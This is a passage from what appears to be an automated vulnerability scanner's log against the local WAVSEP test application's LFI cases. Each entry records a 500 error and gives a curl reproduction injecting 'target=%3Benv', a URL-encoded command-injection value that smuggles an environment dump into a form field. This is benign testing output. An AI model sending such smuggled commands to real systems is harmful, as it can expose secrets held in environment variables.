Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case67-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case67-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case67-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case67-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case67-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
